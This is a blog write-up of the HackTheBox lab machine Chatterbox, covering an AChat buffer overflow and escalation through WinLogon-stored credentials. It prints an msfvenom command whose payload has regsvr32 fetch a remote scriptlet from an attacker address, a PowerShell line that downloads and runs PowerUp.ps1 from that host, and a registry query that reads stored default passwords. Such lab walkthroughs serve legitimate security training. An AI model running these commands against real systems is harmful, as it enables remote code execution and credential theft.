· Manuel López Pérez · writeups  · 2 min read

WriteUp - Chatterbox (HackTheBox)

Chatterbox write-up (HackTheBox): Easy Windows machine that exploits a buffer overflow in AChat (CVE-2015-8295) to gain RCE, then escalates to SYSTEM by abusing the WinLogon registry and psexec.

Chatterbox write-up (HackTheBox): Easy Windows machine that exploits a buffer overflow in AChat (CVE-2015-8295) to gain RCE, then escalates to SYSTEM by abusing the WinLogon registry and psexec.

In this post we will resolve the machine Chatterbox from HackTheBox. It is a simple but entertaining Windows machine.

My nick in HackTheBox is: manulqwerty If you have any proposal or correction do not hesitate to leave a comment.

WriteUp

Enumeration

As always, the first thing will be a port scan with Nmap: We are looking for exploits on the only service found: AChat. It’s Remote Buffer Overflow

Exploitation

We will create our payload with msfvenom, as indicated in exploit-db We will use the module of Metasploit:

exploit/multi/script/web_delivery

which will generate a command that when executed will return shell:

msfvenom -a x86 --platform Windows -p windows/exec CMD='regsvr32 /s /n /u /i:http://10.10.14.10/s5hBEnl.sct scrobj.dll' -e x86/unicode_mixed -b '\\x00\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff' BufferRegister=EAX -f python

Now, we paste the result of this command in the file 36025.py and execute it:

Upgrade to Meterpreter:

sessions -u 1

Post-Exploitation

We’ll execute PowerUp.ps1 where we can see the WinLogon reg: powershell.exe IEX (New-Object System.Net.Webclient).DownloadString(‘http://10.10.14.10/PowerUp.ps1’);Invoke-AllChecks

We can also see it manually:

reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>nul | findstr “DefaultUserName DefaultDomainName DefaultPassword”

Let’s try to use these credentials with the MSF module: exploit/windows/smb/psexec, the machine does not have the port 445 open so we will use portfwd of Meterpreter:

As you can see, it seems that the credentials are correct but we don’t get shell. Before testing the psexec of Impacket, we will use the module: post/windows/manage/run_as; with powercat we’ll execute a reverse shell:

Another way to get the root flag, is to change the privileges of the file to be able to read it without having to escalate to Adminsitrator:

Back to Blog

Related Posts

View All Posts »
WriteUp - Chatterbox (HackTheBox)

WriteUp - Chatterbox (HackTheBox)

Write-up de Chatterbox (HackTheBox): máquina Windows fácil que explota un buffer overflow en AChat (CVE-2015-8295) para obtener RCE, luego escalada a SYSTEM abusando del registro WinLogon y psexec.

WriteUp – Rabbit (HackTheBox)

WriteUp – Rabbit (HackTheBox)

Rabbit write-up (HackTheBox): Windows machine that exploits time-based SQLi in Complain Management System for RCE via xp_cmdshell + msbuild NPS payload, and escalates to SYSTEM by abusing WAMP64 running as SYSTEM.

WriteUp – Rabbit (HackTheBox)

WriteUp – Rabbit (HackTheBox)

Write-up de Rabbit (HackTheBox): máquina Windows alta que explota SQLi time-based en Complain Management System para RCE vía xp_cmdshell + msbuild NPS payload, y escala a SYSTEM abusando de WAMP64 ejecutado como SYSTEM.

WriteUp - Fighter (HackTheBox)

WriteUp - Fighter (HackTheBox)

Write-up of Fighter (HackTheBox): medium-level Windows machine exploiting time-based SQLi to extract credentials, gets RCE via xp_cmdshell + msbuild NPS payload, and escalates to SYSTEM with Capcom.sys (CVE-2019-7253) + bypass of checks.